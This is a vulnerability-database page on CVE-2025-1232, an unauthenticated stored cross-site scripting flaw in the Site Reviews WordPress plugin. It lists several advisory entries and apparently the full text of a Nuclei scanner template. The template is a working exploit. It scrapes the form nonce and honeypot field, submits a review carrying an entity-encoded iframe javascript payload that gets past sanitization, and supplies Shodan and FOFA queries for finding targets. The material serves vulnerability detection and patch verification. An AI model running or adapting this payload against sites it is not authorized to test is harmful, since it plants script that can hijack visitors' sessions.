| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2025-1232 | 19 Mar 202506:52 | – | circl | |
| WordPress plugin Site Reviews 安全漏洞 | 19 Mar 202500:00 | – | cnnvd | |
| CVE-2025-1232 | 19 Mar 202506:00 | – | cve | |
| CVE-2025-1232 Site Reviews < 7.2.5 - Unauthenticated Stored XSS | 19 Mar 202506:00 | – | cvelist | |
| EUVD-2025-6715 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-1232 | 19 Mar 202506:15 | – | nvd | |
| CVE-2025-1232 | 19 Mar 202506:15 | – | osv | |
| WordPress Site Reviews plugin < 7.2.5 - Unauthenticated Stored XSS vulnerability | 19 Mar 202508:01 | – | patchstack | |
| PT-2025-11664 · Unknown · Site Reviews | 19 Mar 202500:00 | – | ptsecurity | |
| CVE-2025-1232 | 7 Jan 202609:54 | – | redhatcve |
id: CVE-2025-1232
info:
name: Site Reviews < 7.2.5 - Unauthenticated Stored XSS
author: 0x_Akoko
severity: high
description: |
Site Reviews WordPress plugin before 7.2.5 contains a stored cross-site scripting caused by improper sanitization and escaping of review fields, letting unauthenticated users execute malicious scripts, exploit requires no authentication.
impact: |
Unauthenticated users can execute malicious scripts in the context of site visitors, potentially leading to session hijacking or defacement.
remediation: |
Update to version 7.2.5 or later.
reference:
- https://wpscan.com/vulnerability/c4ea8357-ddd7-48ac-80c9-15b924715b14/
- https://nvd.nist.gov/vuln/detail/CVE-2025-1232
- https://research.cleantalk.org/cve-2025-1232/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2025-1232
epss-score: 0.01856
epss-percentile: 0.76626
cwe-id: CWE-79
cpe: cpe:2.3:a:geminilabs:site-reviews:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: geminilabs
product: site-reviews
shodan-query: http.component:"WordPress"
fofa-query: body="site-reviews" || body="glsr-form"
tags: cve,cve2025,wordpress,wp,wp-plugin,site-reviews,xss,stored
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/pages?per_page=100"
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, 'glsr-form-wrap')
condition: and
internal: true
extractors:
- type: regex
name: honeypot
group: 1
regex:
- 'display:none[\s\S]{0,500}?name=\\"site-reviews\[([a-f0-9]{8})\]\\"'
internal: true
- type: regex
name: post_id
group: 1
regex:
- 'name=\\"site-reviews\[_post_id\]\\"[\s\S]{0,5}?value=\\"([^\\"]*)\\"'
internal: true
- type: regex
name: form_id
group: 1
regex:
- 'name=\\"site-reviews\[form_id\]\\"[\s\S]{0,5}?value=\\"([^\\"]*)\\"'
internal: true
- type: regex
name: terms_exist
group: 1
regex:
- 'name=\\"site-reviews\[terms_exist\]\\"[\s\S]{0,5}?value=\\"([^\\"]*)\\"'
internal: true
- type: regex
name: nonce
group: 1
regex:
- 'name=\\"site-reviews\[_nonce\]\\"[\s\S]{0,5}?value=\\"([^\\"]*)\\"'
internal: true
- type: regex
name: form_signature
group: 1
regex:
- 'name=\\"site-reviews\[form_signature\]\\"[\s\S]{0,5}?value=\\"([^\\"]*)\\"'
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
action=glsr_public_action&_ajax_request=true&site-reviews%5B_action%5D=submit-review&site-reviews%5B_nonce%5D={{nonce}}&site-reviews%5B_post_id%5D={{post_id}}&site-reviews%5B_referer%5D=&site-reviews%5Bassigned_posts%5D=&site-reviews%5Bassigned_terms%5D=&site-reviews%5Bassigned_users%5D=&site-reviews%5Bexcluded%5D=&site-reviews%5Bform_id%5D={{form_id}}&site-reviews%5Bterms_exist%5D={{terms_exist}}&site-reviews%5Bform_signature%5D={{form_signature}}&site-reviews%5B{{honeypot}}%5D=&site-reviews%5Brating%5D=5&site-reviews%5Btitle%5D=Great+Service&site-reviews%5Bcontent%5D=%26amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Blt%3Biframe+src%3Djavascript%3Aalert%28document.domain%29%26amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bgt%3B&site-reviews%5Bname%5D=TestReviewer&site-reviews%5Bemail%5D=reviewer%40example.com&site-reviews%5Bterms%5D=1
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"success":true'
- 'javascript:alert(document.domain)'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100def1b5f20926274f1a86253819e4eda89dd62161246f2b547a34a9d4d08332dc022100be65e64b5b3f918cd9dd74c44e2657f0f426243e9f6eb22b29ce405f85392bea:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation